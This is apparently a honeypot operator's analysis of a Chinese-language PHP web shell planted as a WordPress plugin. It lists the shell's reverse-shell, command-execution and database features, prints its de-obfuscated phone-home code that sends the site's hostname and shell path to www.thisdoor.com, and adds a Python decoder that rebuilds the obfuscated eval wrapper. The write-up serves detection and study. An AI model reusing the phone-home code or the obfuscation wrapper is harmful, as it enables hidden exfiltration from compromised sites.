A rather aesthetic Chinese language web shell, with lots of features, including a moderately well-hidden phone home.
Kaylin has appeared in a kinked plugin my honey pot has caught.
95.85.38.41 is a Digital Ocean IP address. Not worth following up.
Downloaded to my WordPress honey pot as a plugin install. Not an upgrade, a straight up install, to a file editor.php.
I seem to remember that all plugins have the Zip file format. This code got sent to my honey pot as straight ASCII text. This may not even work.
- De-obfuscate 95.85.38.41WjH2yKqyGTm6pK8KcQwmrQAAAAA.0.file: revphp *file > fx1.php
- Hand edit fx1.php to change "eval" to "print"
- Execute: php fx1.php > dx1.php
- Pretty print dx1.php to get fx2.php
HTML generated by fx2.php sets the character set to GB2312, a "simplified Chinese character" character set.
Indeed, it displays Chinese characters in the tabs for its various functions.
- File management functions
- Scan files for keywords
- Antivirus, seems to scan files for something
- Run backshell on exploited machine, Perl, PHP, compiled C or native PHP, on port 443
- exec a shell function on exploited machine, Windows or Linux
- execute SQL in Postgres, SQLServer, Oracle or MySQL databases on exploited machine.
- eval PHP source code
- Display phpinfo()
- Upload files
Hidden Phone Home
It looks like kaylin phones home on most or all invocations. This line of code gets executed on every invocation:
define('EXISTS_PHPINFO', getinfo() ? true : false);
Hidden inside getinfo() is a call to postinfo(), which contains a slightly obfuscated piece of PHP.
- Hand-edit fx2.php (kaylin) into s1.php
- Invoke php s1.php > ph1.php, which is still obfuscated.
- Pretty-print ph1.php, yielding fx3.php, the code below.
The decrypting is: str_rot13(base64_decode(str_rot13($string))), which yields PHP code where strings are obfuscated using PHP's "\xNN" per-character hex encoding, so still obfuscated to the human eye.
<?php
// Phone-home target; in fx3.php these two literals are "\xNN" hex-escaped.
$host = "www.thisdoor.com";
$get = "/cool/update.php?g=";
// Query string: compromised hostname, path to the shell, and $array (never initialized here).
$get .= bin2hex($_SERVER['HTTP_HOST']) . "&s=" . bin2hex($_SERVER['PHP_SELF']) . "&p=" . $array;
$data = "GET " . $get . " HTTP/1.1\r\nHost:" . $host . "\r\nConnection: Close\r\n\r\n";
if (function_exists("fsockopen")) {
    // hexdec(50) is 80: a plain HTTP request, with errors suppressed by @.
    $sock = @fsockopen($host, hexdec(50));
    @fputs($sock, $data);
    @fclose($sock);
} else {
    // Fallback when sockets are unavailable: the same request through the http:// wrapper.
    @file_get_contents("http://" . $host . $get);
}
$array should evaluate to some password, but I can't see that it gets initialized. Nevertheless, the phone home code above sends the compromised hostname, the path to kaylin and maybe the WordPress password of the compromised site to www.thisdoor.com.
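Decoding this layer without running it, as an added example that is not Kaylin's code and not from the original post: the script below reproduces the wrapper described above, str_rot13(base64_decode(str_rot13(...))) around PHP whose string literals are "\xNN" hex-escaped, decodes it statically, and reports what the phone home would send and where. The sample plugin file is constructed to mirror the structure described under Hidden Phone Home (getinfo() calling postinfo(), the define() line), and its inner PHP follows the decoded code above with the literals re-escaped; that skeleton and the sample are assumptions, not the captured file.

```python
"""Static decoder for the str_rot13/base64/str_rot13 layer plus "\\xNN" strings.

Added example. Nothing here is Kaylin's own code; the sample plugin file is
constructed to match the structure the write-up describes so the script runs
offline, and no PHP is executed at any point.
"""
import base64
import codecs
import re


def php_hex_escape(s: str) -> str:
    """Encode a string the way the inner layer does: one "\\xNN" per character."""
    return "".join("\\x%02x" % ord(c) for c in s)


def php_hex_unescape(php_src: str) -> str:
    """Turn every "\\xNN" escape in PHP source back into the character it hides."""
    return re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), php_src)


def encode_layer(payload: str) -> str:
    """Mirror image of decode_layer(); used only to build the offline sample."""
    inner = codecs.encode(payload, "rot13")
    return codecs.encode(base64.b64encode(inner.encode("latin-1")).decode("ascii"), "rot13")


def decode_layer(blob: str) -> str:
    """str_rot13(base64_decode(str_rot13($string))), innermost call first."""
    stage1 = codecs.decode(blob, "rot13")
    stage2 = base64.b64decode(stage1).decode("latin-1")
    return codecs.decode(stage2, "rot13")


# Matches the triple-call wrapper around a single-quoted or double-quoted literal.
WRAPPER_RE = re.compile(
    r"str_rot13\s*\(\s*base64_decode\s*\(\s*str_rot13\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)\s*\)\s*\)"
)


def find_wrapped_payloads(php_src: str) -> list:
    """Return every string literal wrapped in the triple-call decoder."""
    return WRAPPER_RE.findall(php_src)


def extract_phone_home(decoded_php: str) -> dict:
    """Pull the observable facts out of a decoded phone-home: target host and
    path, port (hexdec(NN) is read as hex), which $_SERVER fields leave the box,
    and which transport functions are present."""
    host = re.search(r'\$host\s*=\s*"([^"]*)"', decoded_php)
    path = re.search(r'\$get\s*=\s*"([^"]*)"', decoded_php)
    port = re.search(r"hexdec\(\s*['\"]?([0-9a-fA-F]+)['\"]?\s*\)", decoded_php)
    return {
        "host": host.group(1) if host else None,
        "path": path.group(1) if path else None,
        "port": int(port.group(1), 16) if port else None,
        "exfiltrated": re.findall(r"\$_SERVER\['([A-Za-z_]+)'\]", decoded_php),
        "transports": [f for f in ("fsockopen", "file_get_contents", "curl_exec") if f in decoded_php],
    }


def analyse(php_src: str) -> list:
    """Decode each wrapped payload statically and summarise its phone-home.
    This is the static counterpart of the eval-to-print hand edit in the write-up."""
    results = []
    for blob in find_wrapped_payloads(php_src):
        decoded = php_hex_unescape(decode_layer(blob))
        results.append(extract_phone_home(decoded))
    return results


# Constructed sample (assumption): inner PHP follows the decoded phone-home shown
# in the write-up with its literals hex-escaped; the getinfo()/postinfo()/define()
# skeleton is modelled on the description, not copied from the captured file.
INNER_PHP = "\n".join([
    '$host = "' + php_hex_escape("www.thisdoor.com") + '";',
    '$get = "' + php_hex_escape("/cool/update.php?g=") + '";',
    "$get .= bin2hex($_SERVER['HTTP_HOST']) . \"&s=\" . bin2hex($_SERVER['PHP_SELF']) . \"&p=\" . $array;",
    '$data = "GET " . $get . " HTTP/1.1\\r\\nHost:" . $host . "\\r\\nConnection: Close\\r\\n\\r\\n";',
    'if (function_exists("fsockopen")) {',
    '    $sock = @fsockopen($host, hexdec(50)); @fputs($sock, $data); @fclose($sock);',
    '} else {',
    '    @file_get_contents("http://" . $host . $get);',
    '}',
])
SAMPLE_PLUGIN = "\n".join([
    "<?php",
    "function postinfo() {",
    "    eval(str_rot13(base64_decode(str_rot13('" + encode_layer(INNER_PHP) + "'))));",
    "}",
    "function getinfo() { postinfo(); return true; }",
    "define('EXISTS_PHPINFO', getinfo() ? true : false);",
])

if __name__ == "__main__":
    for hit in analyse(SAMPLE_PLUGIN):
        print(hit)
```

Running the file prints one dictionary per wrapped payload; on the constructed sample it reports www.thisdoor.com, the path /cool/update.php?g=, port 80 (hexdec(50)), and HTTP_HOST and PHP_SELF as the exfiltrated $_SERVER fields. The same WRAPPER_RE is usable on its own as a scan signature across a plugin directory, since the triple call has no legitimate reason to appear in plugin code.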
Kaylin can execute a process that creates a "backshell": an interactive command shell whose stdin and stdout are connected to a TCP socket opened from the compromised WordPress host out to a designated IP address, circumventing any protection provided by NAT or simpler firewalling in front of the WordPress host.
Kaylin contains 4 different backshells.
The Perl and Python backshells probably only run on Linux servers, since the appropriate interpreter gets invoked via a Linux-style path.
The compiled C backshell is a Base64-encoded ELF executable:
interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.9
The PHP backshell is built into Kaylin. It just might work on either a Windows or a Linux server. It's invokable as either "php" or "phpwin".
Kaylin tries to find out if MySQL, MsSql, Oracle, Sybase or Postgres databases are installed by checking whether various PHP functions related to those databases exist. php.ini entries allow site admins to include only the relevant libraries in a given PHP installation.
It uses Oracle's OCI library to run commands against Oracle databases, which strikes me as not typical for script kiddie level hacking.
www.thisdoor.com → 45.32.108.188
45.32.108.188 → 45.32.108.188.vultr.com
45.32.108.188.vultr.com does not seem to have a DNS A record.
Domain thisdoor.com is registered to a Shanghai address according to whois.